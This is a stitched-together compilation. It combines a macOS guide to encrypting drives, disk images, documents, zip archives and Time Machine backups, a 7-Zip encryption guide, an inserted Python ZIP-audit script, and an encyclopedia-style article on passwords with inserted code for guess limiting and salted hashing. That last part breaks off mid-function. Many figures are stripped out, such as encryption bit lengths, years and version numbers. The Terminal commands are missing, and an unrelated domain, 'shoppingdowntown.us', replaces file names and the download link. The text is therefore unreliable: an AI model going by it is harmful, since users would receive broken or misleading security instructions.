Encrypting Drives and Partitions (Option 1)

To encrypt a drive or partition using the Finder, follow these steps:

      1. Anything can happen from a sudden drive failure to a power outage so always make sure you have a current backup.
      2. Right-click on the drive icon on your Desktop, in a Finder window, or in the Finder sidebar.
      3. Choose Encrypt. A dialog displays inviting you to set a password, type it a second time, and enter a password hint. The password hint is required, so you cannot leave it blank. If you think you need a hint, set one that only makes sense to you. Since you will need to enter the password after every restart or every time you connect the drive, the chances of forgetting that password are slim, so you may not need a hint. If you don't think you'll forget the password, set a hint that makes no sense at all and will only confuse an unauthorized person.
      4. Click Encrypt Disk and let it work for you in the background. When the encryption has completed, you'll see Decrypt in the contextual menu when you right-click on the drive. If you ever want to turn off the encryption, choose Decrypt and enter the password, and macOS will decrypt the drive and remove its encryption.

Note that when you encrypt drives on macOS Big Sur, they are converted to the APFS format, which is not readable by Macs running versions of macOS older than High Sierra.

Encrypting Drives and Partitions (Option 2)

You can also encrypt drives or partitions through Disk Utility, but it will require you to erase them in the process. For new or empty hard drives or drives that still need to be partitioned, Disk Utility is a good option since you're likely already using it anyway to handle the partitioning.

To encrypt a drive or partition using Disk Utility, follow these steps:

      1. Open Disk Utility; it's in the Utilities folder in your Applications folder.
      2. Select the drive or partition you want to encrypt. In this example, I'm using a USB thumb drive, but you can do this on any drive, other than your startup drive. Make sure that you've backed up the data on the drive, because the next step erases it completely.
      3. Click Erase. In the dialog that displays, name the drive, then click the Format menu. In macOS Big Sur, you have to use the APFS format to encrypt drives: choose APFS (Encrypted). Enter a password, type the password again in the Verify field, then enter a password hint; it's not required here, but it is recommended.
      4. Click Choose when done, and the drive or partition will be erased and encrypted. Note that when you encrypt drives on macOS Big Sur, they are converted to the APFS format, which is not readable by Macs running versions of macOS older than High Sierra.

You can verify the encryption is in place by clicking that same drive again in Disk Utility. It will now show that the drive is formatted in an encrypted format as shown in the screenshot below.

Going forward, every time you restart your Mac or mount the drive, a window like this displays:

If you save the password in your keychain, then you won't need to enter it again. However, if someone manages to get into your account, the drive will mount automatically. So it's better protected to not save the password, but you'll need to remember it, and it's more likely that people choose weaker passwords when they have to remember them.

Encrypting Disk Images

You can also create encrypted disk images to store files. Think of these as folders with their own encryption. Even if the hard drive the data is on is already encrypted, some want an additional layer of security for certain files or folders, and an encrypted disk image has its own password.

You can create two types of disk images: you can create standard disk images, with a fixed size, or you can create "sparse images" for which you define a maximum size, but which only use the amount of space of the files you've added. However, these disk images can grow as you add more files to them. The encryption applies to any files or folders you add to the disk image.

To create an encrypted disk image using Disk Utility, follow these steps:

      1. Open Disk Utility; it's in the Utilities folder of your Applications folder.
      2. Choose File > New Image > Blank Image. If you want to create a disk image from an existing folder, choose File > New Image > Image From Folder.
      3. The following dialog displays:

        Depending on your needs, this can be set up in different ways. I'll stick with the scenario that fits the most common uses.

      4. There are a number of configuration options and settings:
        • The Save As file name is what you'll see in the Finder, such as shoppingdowntown.us
        • In Where, choose a location to save the disk image.
        • The Name is what displays on your Desktop after you double click the disk image.
        • For Format, choose APFS for a Mac that has an SSD and is running macOS or later. Choose Mac OS Extended (Journaled) if you want to use the disk image on a Mac running macOS or earlier. If you want to access the disk image on Windows, and it's 32 GB or smaller, choose MS-DOS (FAT); for Windows above 32 GB, choose ExFAT.
        • For Partitions, let Disk Utility set the appropriate option according to the format you choose.
        • For Image Format, you can choose read/write disk image for standard disk images, or you can choose sparse image or sparse image bundle if you want a disk image that will expand as you add files.
        • Select the Size of the disk image. In general, you either know how many files you want to put in your disk image, or you want to leave space to add more files. If you choose a read/write disk image, set the size for what you need, leaving room to add more files if necessary. The disk image will take up that amount of space on your drive. However, if you choose sparse image, set the maximum size you want for the disk image. The disk image won't take up much size right away, but will grow as you add or remove files. An empty sparse image is less than 10 MB, but as you add more files it will grow. So don't hesitate; set it to 1 GB or more.
        • Next choose the Encryption level. There are two encryption options, and if you have a lot of files, and a large disk image, you should choose bit encryption. bit encryption is more secure, but slower, though if you have a recent Mac it should have no trouble working with that level of encryption. Click Save when everything is set up and Disk Utility creates the disk image, then the Finder opens and mounts the disk image; you'll find it on your Desktop or in the Finder sidebar.
      5. Select the disk image you just created and press Command+i or right click on it and select "Get Info."

        The reason I recommend using the sparse disk image now becomes clear. I set the disk image to be 1 GB, but it only takes up MB on my drive. This is because the sparse disk image format grows in size when needed, until it reaches the size you set in Disk Utility; in my case, this is 1 GB. If you find you need a bigger disk image down the road, just create a new one and copy the data over.

      6. If you want to encrypt an existing folder, select the folder you want to encrypt, set a name, encryption strength, and format (read/write if you want to make changes to the contents later on).

Keep in mind that this disk image, created from a folder, will not be able to store more files than what's already there. This makes the Image From Folder method a good one for long term storage of files you're done with. If you need to frequently access the contents or add to it, a sparse disk image, or a read/write disk image, of a size larger than the files you currently want to store in it, is a better way to go.

Encrypt Documents and Files

Data has to leave your Mac, and for any number of reasons. It's safe on your Mac, if you take the precautions explained in this article, but what if you need to email or message a document or file to someone? There are several ways to password protect your documents and files, depending on the type of files.

Password Protecting through the Preview App

The Preview app is versatile and often underestimated. One of the things it can do for you is encrypt files, allowing you to protect them with a password.

To password protect a file using Preview, follow these steps:

      1. Open any PDF file or image in Preview. On macOS, you can save any file as a PDF from the Print menu. Choose File > Print, then click the PDF menu and choose Save as PDF.
      2. From the File menu, select Export as PDF…
      3. In the save dialog that drops down, rename your file if you want, then click the Show Details button at the bottom.
      4. You'll see an option to enable encryption and set a password.
      5. Once a password is set and the file is saved, when you open the PDF file it will prompt for a password.

The above steps will work for any image or document that Preview can open.

Password Protecting an Existing PDF through the Print Dialog

You may already have a PDF that you would like to protect with a password. This can also be done using the Preview app. This works for almost any file, image, or document, and from most applications that support the standard macOS print options. This could be an image opened in the Preview app, a website viewed in Safari, or a TextEdit document. Keep in mind that this method will always result in a PDF file so you lose the ability to edit. It is, however, ideal for quickly protecting a file if it has to be sent to someone.

To password protect a file using the Print Dialog, follow these steps:

      1. In the application you are viewing the file with, choose File > Print.
      2. Click the PDF button in the bottom of the dialog, and choose Save as PDF from the popup menu.
      3. Click the Security Options button.
      4. A window displays with more options than you saw above, when exporting to PDF. You can set a password that's required to open the file, but you can also limit someone's ability to copy from and print the document; these must be different from the main password. Click OK, then save the file.

As you can see there are several routes here to the same destination. Your needs may vary slightly, so pick what works for you in that moment.

Password Protecting Pages, Numbers, and Keynote Documents

If you create a new document in Pages, Numbers, or Keynote there is no need to save your document as a PDF. You can password protect the actual document and keep it as an editable file. To password protect your Pages, Numbers or Keynote document, follow these steps:

      1. With your document open, choose File > Set Password.
      2. Enter a password, enter it a second time in the Verify field, then click Set Password.
      3. Another way to password protect your Pages, Numbers, or Keynote file is by using the Share menu. Choose Share > Send a Copy, choose how you want to send the file, then check Require password to open, and enter a password.
      4. A window opens which, among other things, will let you set a password.
      5. You can also select a file type. These options differ slightly depending on the application you're using, and some, but not all of them, will offer a password protection option.

Password Protecting Word, Excel, and PowerPoint Documents

The Office apps (Word, Excel, and PowerPoint) allow you to password protect documents. Each of the three apps does this a bit differently.

Microsoft Word

In Microsoft Word, click the Review tab, then click Protect in the ribbon and choose Protect Document. A dialog displays giving you options to password protect a document for opening and modifying the document, as well as other options.

Microsoft Excel

In Excel, you can password protect a spreadsheet by choosing File > Passwords. A small dialog displays, where you can set a password to open the document, and to modify it.

Microsoft PowerPoint

As above with Excel, you choose File > Passwords to protect a PowerPoint presentation. You can set a password to protect a document from opening and another to protect it from modification.

Creating a Password Protected .zip Archive

If, for whatever reason, you cannot password protect the file or folder you want to secure, such as if the file needs to be compatible with another operating system, wrapping files or a folder in a .zip archive can come in handy. Any file, whether it's an image, document or video, can be archived. Size is not an issue, but will depend on what you do with the archive once it's created. You may, for example, have limitations to the size of attachments, if you want to send it by email. However, you can send attachments using MailDrop; see this article for more on MailDrop, and for a number of ways to securely send files.

Creating a password protected archive is convenient if you need to send files quickly and securely, and if the archive needs to be compatible with other operating systems. If you send this type of archive to a Windows user, they can open it. If you plan on creating large archives for storage or to transport on a flash drive, I recommend using the above mentioned encrypted disk image instead. Creating a password-protected zip archive is, unfortunately, not as easy as the above mentioned methods; it requires the use of the command line.

To create a password protected .zip archive, follow these steps:

Archiving a Single File

      1. Open the Terminal app which can be found in the Utilities folder inside your Applications folder. When Terminal opens you will see a default string of text like this:

        This is your Mac's name, current directory location (~ is a shortcut for your home folder), and your username. This is called a "prompt," and it displays when Terminal is waiting for you to enter a command.

      2. In this example, I have a file on my desktop "shoppingdowntown.us" that I want to put in a password protected .zip archive. In Terminal, I type the following:
      3. "zip -ej " (including the space at the end) tells Terminal you want to create a zip archive (zip) with encryption (e) and no file paths included (j). Next, you have to tell it where to save the zip file and what name it must get. The easiest thing is to just use your desktop which can be entered as "~/Desktop." When done, it should look like this (add a space after the file extension):
      4. Now Terminal needs to know which file is to be archived. The simplest way to do this is to drag the file you want to encrypt into the Terminal window. This adds the file path to Terminal. The result should look something like this; make sure there's a space between the two file paths, and this example assumes that you've dragged a file (shoppingdowntown.us) from your Desktop.
      5. Press Enter and Terminal prompts you for a password that will be required to open the .zip file. Terminal will not show any cursor movements while you type the password. Press Enter, and you are asked to verify the password by typing it again. Press Enter a third time and Terminal creates the zip archive. For my example, when Terminal was done, I saw this:
      6. This created "shoppingdowntown.us" on my desktop. When you double-click the file to open it, you see a password request in Archive Utility, the application that expands archives on macOS.

Archiving a Folder

      1. Open Terminal.
      2. For this example, I have a folder on my Desktop named Photos that I want to put in a password protected .zip file. The command to archive a folder is slightly different:

        As with archiving a single file, zip tells Terminal what kind of archive to create and the (e) in -er tells it to encrypt the file. In this case the (r) means recursive, which tells Terminal to archive all the folder contents, even if they are in sub-folders.

      3. Since we're already pointed at the desktop, specifying the saved file name does not require any path information. In my case I am saving it as "shoppingdowntown.us" so I end up with (make sure to leave a space at the end):
      4. Add the folder by dragging it onto the Terminal window, and I see this:
      5. After entering and verifying the password I end up with this:

As you can see above, the zip command shows you how much space it's saved for each item in the folder. Since these photos are already compressed, no space is saved, but what's important here is protecting the archive with a password. In other cases, you will save space when performing this operation.

Encrypt Backups

Your Mac may be set up like Fort Knox, but your backups are copied to an external drive or server. If your backups are not encrypted, an unauthorized user doesn't need to go through all the trouble of accessing your Mac; they can just take your backups instead. Luckily, Apple makes it very easy to encrypt Time Machine backups. There are two ways to do this, and I will cover both. In this example, I will walk through the first time setup of Time Machine.

To set up an encrypted Time Machine backup, follow these steps:

How to Back up to an External Drive or External Drive Partition

      1. Open System Preferences, then click the Time Machine icon; click the padlock to make changes if needed, and then click Select Backup Disk.
      2. Select an external drive or partition to use as a backup destination. Make sure to check Encrypt backups.
      3. Set a strong password and a hint. (Choosing a password hint is mandatory.) When you click Use Disk, Time Machine begins the encryption process. A progress bar displays as the drive or partition is prepared, then the backup starts while the encryption runs in the background.
      4. The backup data is stored in a "Backups.backupdb" folder that you can open and browse, just as on an unencrypted drive. It correctly assumes that since the drive or partition itself is encrypted there is no need to wrap the backups in an encrypted disk image.

How to Back up to a Server, NAS, or Time Capsule

The process for backing up to a server, such as a NAS or file server, is similar to that of backing up to an external drive or drive partition. You can also back up to a Time Capsule, Apple's wi-fi router with a built-in hard disk, that was discontinued in If you are backing up to a NAS, check the documentation for that device to find out how to turn on Time Machine discovery, if this is available. And you can also back up any Mac to another Mac, if file sharing is turned on. See this Apple support document for information about using a network device for Time Machine backups.

Follow these steps to back up your data to a server:

      1. In the Time Machine preferences, select your server or NAS destination, then click "Use Disk."

  • A password request displays: this is the password for your server or NAS.
  • After you authenticate, you are prompted to set a password to encrypt the backup. In this case no hint is required.

  • The backup will begin momentarily. Because the backup is stored on a network volume it is not stored as a "Backups.backupdb" folder but an encrypted sparse bundle image instead. As explained above, this is a type of disk image that expands when more space is needed for additional files.

Distributing Files Securely

When you want to send files securely to others (friends, family, or colleagues), there are many options, and the one you choose depends on the size of the files you want to send, and which software they use. As mentioned above, you can send an encrypted disk image or zip archive by email, using Apple's MailDrop, and not have to worry about the attachment being intercepted, because it's protected by a password.

But there are other ways to send files securely. You can use secure messaging, such as iMessage; you can use online secure file transfer services, such as WeTransfer; you can even use cloud storage, like iCloud, Dropbox, or OneDrive. Because cloud services store files securely, transferring files to others can be as easy as uploading them to your cloud storage service, then sending a link to someone else.

Read our article How to Send Files Securely for more on the various ways to send files securely.

Summing Up

This article has shown you the many ways you can ensure that data and files on your Mac are secure. While this may seem like a lot of work at first, once you set up some of these routines, you'll find that it becomes second nature. Take some time to think about how to secure your files, so you don't have to worry about your data being stolen.

About Jay Vrijenhoek

Jay Vrijenhoek is an IT consultant with a passion for Mac security research.

7-Zip is an open source software used to compress or zip files secured with encryption.

When you send or transfer files that contain Personally Identifiable Information (PII) or other confidential and sensitive data, the files must be encrypted to ensure they are protected from unauthorized disclosure.

7-Zip, like WinZip, creates a container called archive that holds the files to be protected. That archive can be encrypted and protected with a password. 7-Zip is a free software that creates Zip files that can be opened with WinZip or other similar programs.

To obtain a copy of 7-Zip, please see shoppingdowntown.us and select the appropriate Download link.

Once the software is installed, please follow these steps to encrypt a file or folder.

Step 1: Right click on the file / folder to be encrypted.

Step 2: Select “7-Zip” then “Add to archive…”

Step 3: In the Add to Archive window change the name of the archive you wish to create.

Step 4: Change the Archive format to “Zip”.

Step 5: Change the Encryption Method to “AES”.

There is a trade-off between using AES and ZipCrypto. AES is proven much more secure than ZipCrypto, but if you select AES the recipient of the zip file may have to install 7-zip or another zip program to read the file contents. Selecting ZipCrypto may allow users to open the zip file in Windows without a zip program, but it does not provide adequate protection against attackers with modern cracking tools.

It is strongly recommended to use AES to protect sensitive and confidential data.

Step 6: Enter a Password. Use a strong password with at least 8 characters containing upper and lowercase letters, and a minimum of one number.

Step 7: Select “Ok” to create the encrypted archive file. The new archive file will be located in the same folder as the original.

**IMPORTANT**: Do not share a password via email. Passwords must be shared out of band, meaning that you send the file and the password by different communication channels; one on the internet, and one not. The best approach is to call the recipient of the Zip file and convey the password over the phone.
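One way to check which scheme an archive actually uses before it is sent, as an added example that is not part of the original guide: it reads the ZIP headers with Python's standard zipfile module and labels each entry as unencrypted, ZipCrypto, or AES. The function names and the constructed sample archives (headers patched to look encrypted, payload not really encrypted) are assumptions of this example.

```python
import io
import struct
import zipfile

AES_METHOD = 99          # compression-method value that marks a WinZip AES entry
AES_EXTRA_ID = 0x9901    # extra-field header ID that carries the AES parameters
AES_STRENGTH = {1: "AES-128", 2: "AES-192", 3: "AES-256"}


def _aes_strength(extra: bytes):
    """Walk the extra-field records and return the AES strength code, if present."""
    pos = 0
    while pos + 4 <= len(extra):
        field_id, size = struct.unpack_from("<HH", extra, pos)
        body = extra[pos + 4:pos + 4 + size]
        if field_id == AES_EXTRA_ID and len(body) >= 7:
            # Layout: format version, vendor "AE", strength, real compression method
            _ver, _vendor, strength, _method = struct.unpack_from("<H2sBH", body)
            return strength
        pos += 4 + size
    return None


def classify_entry(info: zipfile.ZipInfo) -> str:
    """Label one archive entry by the protection its headers declare."""
    if not info.flag_bits & 0x0001:       # bit 0: entry is encrypted
        return "unencrypted"
    if info.compress_type == AES_METHOD:
        return AES_STRENGTH.get(_aes_strength(info.extra), "AES (strength unknown)")
    if info.flag_bits & 0x0040:           # bit 6: PKWARE strong encryption
        return "PKWARE strong encryption"
    return "ZipCrypto"                    # encrypted, no AES marker: legacy scheme


def audit_archive(data: bytes) -> dict:
    """Map each file name in the archive to its declared protection.

    File names are readable without the password in both schemes, which is
    why this check works on an archive you cannot open."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {i.filename: classify_entry(i) for i in zf.infolist()}


def entries_needing_attention(report: dict) -> list:
    """Names of entries that are not AES-protected."""
    return sorted(n for n, scheme in report.items() if not scheme.startswith("AES-"))


def build_constructed_sample(name: str, encrypted: bool, aes_strength: int = 0) -> bytes:
    """Constructed input for the demo: a one-entry archive whose header fields
    are patched to declare encryption. The payload itself is NOT encrypted."""
    info = zipfile.ZipInfo(name)
    if aes_strength:
        info.extra = struct.pack("<HHH2sBH", AES_EXTRA_ID, 7, 2, b"AE", aes_strength, 0)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(info, b"constructed sample payload")
    raw = bytearray(buf.getvalue())
    if encrypted:
        method = AES_METHOD if aes_strength else 0
        # Patch flags and method in the local header and the central directory.
        for sig, flag_off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
            pos = raw.find(sig)
            (flags,) = struct.unpack_from("<H", raw, pos + flag_off)
            struct.pack_into("<HH", raw, pos + flag_off, flags | 0x0001, method)
    return bytes(raw)


if __name__ == "__main__":
    samples = {
        "plain.zip": build_constructed_sample("notes.txt", encrypted=False),
        "legacy.zip": build_constructed_sample("payroll.xlsx", encrypted=True),
        "aes.zip": build_constructed_sample("payroll.xlsx", encrypted=True, aes_strength=3),
    }
    for archive, data in samples.items():
        report = audit_archive(data)
        print(archive, report, "needs attention:", entries_needing_attention(report))
```

Archives made with Info-ZIP's `zip -e`, the command used in the Mac steps earlier on this page, are reported as ZipCrypto by this check.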

Password

A password, sometimes called a passcode (for example in Apple devices),[1] is secret data, typically a string of characters, usually used to confirm a user's identity.[1] Traditionally, passwords were expected to be memorized, but the large number of password-protected services that a typical individual accesses can make memorization of unique passwords for each service impractical.[2] Using the terminology of the NIST Digital Identity Guidelines,[3] the secret is held by a party called the claimant while the party verifying the identity of the claimant is called the verifier. When the claimant successfully demonstrates knowledge of the password to the verifier through an established authentication protocol,[4] the verifier is able to infer the claimant's identity.

In general, a password is an arbitrary string of characters including letters, digits, or other symbols. If the permissible characters are constrained to be numeric, the corresponding secret is sometimes called a personal identification number (PIN).

Despite its name, a password does not need to be an actual word; indeed, a non-word (in the dictionary sense) may be harder to guess, which is a desirable property of passwords. A memorized secret consisting of a sequence of words or other text separated by spaces is sometimes called a passphrase. A passphrase is similar to a password in usage, but the former is generally longer for added security.[5]

History

Passwords have been used since ancient times. Sentries would challenge those wishing to enter an area to supply a password or watchword, and would only allow a person or group to pass if they knew the password. Polybius describes the system for the distribution of watchwords in the Roman military as follows:

The way in which they secure the passing round of the watchword for the night is as follows: from the tenth maniple of each class of infantry and cavalry, the maniple which is encamped at the lower end of the street, a man is chosen who is relieved from guard duty, and he attends every day at sunset at the tent of the tribune, and receiving from him the watchword—that is a wooden tablet with the word inscribed on it – takes his leave, and on returning to his quarters passes on the watchword and tablet before witnesses to the commander of the next maniple, who in turn passes it to the one next to him. All do the same until it reaches the first maniples, those encamped near the tents of the tribunes. These latter are obliged to deliver the tablet to the tribunes before dark. So that if all those issued are returned, the tribune knows that the watchword has been given to all the maniples, and has passed through all on its way back to him. If any one of them is missing, he makes inquiry at once, as he knows by the marks from what quarter the tablet has not returned, and whoever is responsible for the stoppage meets with the punishment he merits.[6]

Passwords in military use evolved to include not just a password, but a password and a counterpassword; for example in the opening days of the Battle of Normandy, paratroopers of the U.S. st Airborne Division used a password—flash—which was presented as a challenge, and answered with the correct response—thunder. The challenge and response were changed every three days. American paratroopers also famously used a device known as a "cricket" on D-Day in place of a password system as a temporarily unique method of identification; one metallic click given by the device in lieu of a password was to be met by two clicks in reply.[7]

Passwords have been used with computers since the earliest days of computing. The Compatible Time-Sharing System (CTSS), an operating system introduced at MIT inwas the first computer system to implement password login.[8][9] CTSS had a LOGIN command that requested a user password. "After typing PASSWORD, the system turns off the printing mechanism, if possible, so that the user may type in his password with privacy."[10] In the early s, Robert Morris developed a system of storing login passwords in a hashed form as part of the Unix operating system. The system was based on a simulated Hagelin rotor crypto machine, and first appeared in 6th Edition Unix in A later version of his algorithm, known as crypt(3), used a bit salt and invoked a modified form of the DES algorithm 25 times to reduce the risk of pre-computed dictionary attacks.[11]

In modern times, user names and passwords are commonly used by people during a log in process that controls access to protected computer operating systems, mobile phones, cable TV decoders, automated teller machines (ATMs), etc. A typical computer user has passwords for many purposes: logging into accounts, retrieving e-mail, accessing applications, databases, networks, web sites, and even reading the morning newspaper online.

Choosing a secure and memorable password

The easier a password is for the owner to remember, the easier it generally is for an attacker to guess.[12] However, passwords that are difficult to remember may also reduce the security of a system because (a) users might need to write down or electronically store the password, (b) users will need frequent password resets and (c) users are more likely to re-use the same password across different accounts. Similarly, the more stringent the password requirements, such as "have a mix of uppercase and lowercase letters and digits" or "change it monthly", the greater the degree to which users will subvert the system.[13] Others argue longer passwords provide more security (e.g., entropy) than shorter passwords with a wide variety of characters.[14]

In The Memorability and Security of Passwords,[15] Jeff Yan et al. examine the effect of advice given to users about a good choice of password. They found that passwords based on thinking of a phrase and taking the first letter of each word are just as memorable as naively selected passwords, and just as hard to crack as randomly generated passwords.

Combining two or more unrelated words and altering some of the letters to special characters or numbers is another good method,[16] but a single dictionary word is not. Having a personally designed algorithm for generating obscure passwords is another good method.[17]

However, asking users to remember a password consisting of a "mix of uppercase and lowercase characters" is similar to asking them to remember a sequence of bits: hard to remember, and only a little bit harder to crack (e.g. only times harder to crack for 7-letter passwords, less if the user simply capitalises one of the letters). Asking users to use "both letters and digits" will often lead to easy-to-guess substitutions such as 'E' → '3' and 'I' → '1', substitutions that are well known to attackers. Similarly typing the password one keyboard row higher is a common trick known to attackers.[18]

InGoogle released a list of the most common password types, all of which are considered insecure because they are too easy to guess (especially after researching an individual on social media):[19]

  • The name of a pet, child, family member, or significant other
  • Anniversary dates and birthdays
  • Birthplace
  • Name of a favorite holiday
  • Something related to a favorite sports team
  • The word "password"

Alternatives to memorization

Traditional advice to memorize passwords and never write them down has become a challenge because of the sheer number of passwords users of computers and the internet are expected to maintain. One survey concluded that the average user has around passwords.[2] To manage the proliferation of passwords, some users employ the same password for multiple accounts, a dangerous practice since a data breach in one account could compromise the rest. Less risky alternatives include the use of password managers, single sign-on systems and simply keeping paper lists of less critical passwords.[20] Such practices can reduce the number of passwords that must be memorized, such as the password manager's master password, to a more manageable number.

Factors in the security of a password system

The security of a password-protected system depends on several factors. The overall system must be designed for sound security, with protection against computer viruses, man-in-the-middle attacks and the like. Physical security issues are also a concern, from deterring shoulder surfing to more sophisticated physical threats such as video cameras and keyboard sniffers. Passwords should be chosen so that they are hard for an attacker to guess and hard for an attacker to discover using any of the available automatic attack schemes. See password strength and computer security for more information.[21]

Nowadays, it is a common practice for computer systems to hide passwords as they are typed. The purpose of this measure is to prevent bystanders from reading the password; however, some argue that this practice may lead to mistakes and stress, encouraging users to choose weak passwords. As an alternative, users should have the option to show or hide passwords as they type them.[21]

Effective access control provisions may force extreme measures on criminals seeking to acquire a password or biometric token.[22] Less extreme measures include extortion, rubber hose cryptanalysis, and side channel attack.

Some specific password management issues that must be considered when thinking about, choosing, and handling a password follow.

Rate at which an attacker can try guessed passwords

The rate at which an attacker can submit guessed passwords to the system is a key factor in determining system security. Some systems impose a time-out of several seconds after a small number (e.g., three) of failed password entry attempts, also known as throttling.[3]:63B Sec In the absence of other vulnerabilities, such systems can be effectively secure with relatively simple passwords if they have been well chosen and are not easily guessed.[23]

Many systems store a cryptographic hash of the password. If an attacker gets access to the file of hashed passwords, guessing can be done offline, rapidly testing candidate passwords against the true password's hash value. In the example of a web-server, an online attacker can guess only at the rate at which the server will respond, while an off-line attacker (who gains access to the file) can guess at a rate limited only by the hardware on which the attack is running.

Passwords that are used to generate cryptographic keys (e.g., for disk encryption or Wi-Fi security) can also be subjected to high rate guessing. Lists of common passwords are widely available and can make password attacks very efficient. (See Password cracking.) Security in such situations depends on using passwords or passphrases of adequate complexity, making such an attack computationally infeasible for the attacker. Some systems, such as PGP and Wi-Fi WPA, apply a computation-intensive hash to the password to slow such attacks. See key stretching.

Limits on the number of password guesses

An alternative to limiting the rate at which an attacker can make guesses on a password is to limit the total number of guesses that can be made. The password can be disabled, requiring a reset, after a small number of consecutive bad guesses (say 5); and the user may be required to change the password after a larger cumulative number of bad guesses (say 30), to prevent an attacker from making an arbitrarily large number of bad guesses by interspersing them between good guesses made by the legitimate password owner.[24] Attackers may conversely use knowledge of this mitigation to implement a denial of service attack against the user by intentionally locking the user out of their own device; this denial of service may open other avenues for the attacker to manipulate the situation to their advantage via social engineering.
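
The two counters described above can be sketched as follows. This is an added example, not code from the original article; the class and function names, the sample account and the burst size used in the simulation are assumptions, while the thresholds 5 and 30 are the ones quoted in the text.

```python
import hmac
from dataclasses import dataclass

MAX_CONSECUTIVE_FAILURES = 5    # "say 5" in the text: disable, require a reset
MAX_CUMULATIVE_FAILURES = 30    # "say 30" in the text: force a password change


@dataclass
class GuessState:
    consecutive: int = 0      # bad guesses since the last good login
    cumulative: int = 0       # bad guesses since the last reset/password change
    disabled: bool = False
    must_change: bool = False


class GuessLimiter:
    """Tracks failed guesses per account (hypothetical helper for this example)."""

    def __init__(self, verify):
        self._verify = verify          # callable(user, password) -> bool
        self._states = {}

    def state(self, user):
        return self._states.setdefault(user, GuessState())

    def attempt(self, user, password):
        st = self.state(user)
        if st.disabled:
            # Even the correct password is refused: this is the lockout that
            # the text notes can be abused as a denial of service.
            return "disabled"
        if self._verify(user, password):
            # A good login clears the streak but NOT the cumulative count,
            # so bad guesses hidden between good logins still add up.
            st.consecutive = 0
            return "change-required" if st.must_change else "ok"
        st.consecutive += 1
        st.cumulative += 1
        if st.cumulative >= MAX_CUMULATIVE_FAILURES:
            st.must_change = True
        if st.consecutive >= MAX_CONSECUTIVE_FAILURES:
            st.disabled = True
            return "disabled"
        return "denied"

    def reset(self, user):
        """Called after an administrative reset or a completed password change."""
        self._states[user] = GuessState()


# Constructed sample account; a real system would call its password verifier.
SAMPLE_ACCOUNTS = {"alice": "tablet-before-witnesses"}


def sample_verify(user, password):
    expected = SAMPLE_ACCOUNTS.get(user)
    return expected is not None and hmac.compare_digest(
        expected.encode(), password.encode())


def simulate_interleaving(limiter, user, good_password, burst=4, max_rounds=100):
    """Bursts of bad guesses, each followed by the owner's good login.

    Returns (bad_guesses_made, outcome_of_owner_login) at the first owner
    login that is not a plain "ok".
    """
    bad = 0
    for _ in range(max_rounds):
        for _ in range(burst):
            limiter.attempt(user, f"guess-{bad}")
            bad += 1
        outcome = limiter.attempt(user, good_password)
        if outcome != "ok":
            return bad, outcome
    return bad, "ok"


if __name__ == "__main__":
    limiter = GuessLimiter(sample_verify)
    print(simulate_interleaving(limiter, "alice", SAMPLE_ACCOUNTS["alice"]))
```

With bursts of four, the consecutive counter never trips, and it is the cumulative counter that ends the guessing by forcing a password change.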

Form of stored passwords

Some computer systems store user passwords as plaintext, against which to compare user logon attempts. If an attacker gains access to such an internal password store, all passwords—and so all user accounts—will be compromised. If some users employ the same password for accounts on different systems, those will be compromised as well.

More secure systems store each password in a cryptographically protected form, so access to the actual password will still be difficult for a snooper who gains internal access to the system, while validation of user access attempts remains possible. The most secure don't store passwords at all, but a one-way derivation, such as a polynomial, modulus, or an advanced hash function.[14] Roger Needham invented the now-common approach of storing only a "hashed" form of the plaintext password.[25][26] When a user types in a password on such a system, the password handling software runs through a cryptographic hash algorithm, and if the hash value generated from the user's entry matches the hash stored in the password database, the user is permitted access. The hash value is created by applying a cryptographic hash function to a string consisting of the submitted password and, in many implementations, another value known as a salt. A salt prevents attackers from easily building a list of hash values for common passwords and prevents password cracking efforts from scaling across all users.[27] MD5 and SHA1 are frequently used cryptographic hash functions, but they are not recommended for password hashing unless they are used as part of a larger construction such as in PBKDF2.[28]

The stored data—sometimes called the "password verifier" or the "password hash"—is often stored in Modular Crypt Format or RFC hash format, sometimes in the /etc/passwd file or the /etc/shadow file.[29]

The main storage methods for passwords are plain text, hashed, hashed and salted, and reversibly encrypted.[30] If an attacker gains access to the password file, then if it is stored as plain text, no cracking is necessary. If it is hashed but not salted then it is vulnerable to rainbow table attacks (which are more efficient than cracking). If it is reversibly encrypted then if the attacker gets the decryption key along with the file no cracking is necessary, while if he fails to get the key cracking is not possible. Thus, of the common storage formats for passwords only when passwords have been salted and hashed is cracking both necessary and possible.[30]

If a cryptographic hash function is well designed, it is computationally infeasible to reverse the function to recover a plaintext password. An attacker can, however, use widely available tools to attempt to guess the passwords. These tools work by hashing possible passwords and comparing the result of each guess to the actual password hashes. If the attacker finds a match, they know that their guess is the actual password for the associated user. Password cracking tools can operate by brute force (i.e. trying every possible combination of characters) or by hashing every word from a list; large lists of possible passwords in many languages are widely available on the Internet.[14] The existence of password cracking tools allows attackers to easily recover poorly chosen passwords. In particular, attackers can quickly recover passwords that are short, dictionary words, simple variations on dictionary words, or that use easily guessable patterns.[31] A modified version of the DES algorithm was used as the basis for the password hashing algorithm in early Unix systems.[32] The crypt algorithm used a bit salt value so that each user's hash was unique and iterated the DES algorithm 25 times in order to make the hash function slower, both measures intended to frustrate automated guessing attacks.[32] The user's password was used as a key to encrypt a fixed value. More recent Unix or Unix-like systems (e.g., Linux or the various BSD systems) use more secure password hashing algorithms such as PBKDF2, bcrypt, and scrypt, which have large salts and an adjustable cost or number of iterations.[33] A poorly designed hash function can make attacks feasible even if a strong password is chosen. See LM hash for a widely deployed and insecure example.[34]
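
The difference between an unsalted hash and a salted verifier with an adjustable iteration count can be seen in a short sketch. This is an added example, not code from the original article; the `$`-separated storage format, the function names and the iteration count are assumptions made for the illustration, and PBKDF2 is used because it is one of the constructions the text names.

```python
import hashlib
import hmac
import os
from typing import Optional

ALGORITHM = "pbkdf2-sha256"   # label kept with each verifier (assumed format)
ITERATIONS = 200_000          # adjustable cost; value chosen for this example
SALT_BYTES = 16


def unsalted_sha1(password: str) -> str:
    """Weak form: equal passwords always yield equal hashes, so one
    precomputed table serves against every account."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def make_verifier(password: str, *, iterations: int = ITERATIONS,
                  salt: Optional[bytes] = None) -> str:
    """Return 'algorithm$iterations$salt_hex$digest_hex' for storage."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)      # fresh random salt per password
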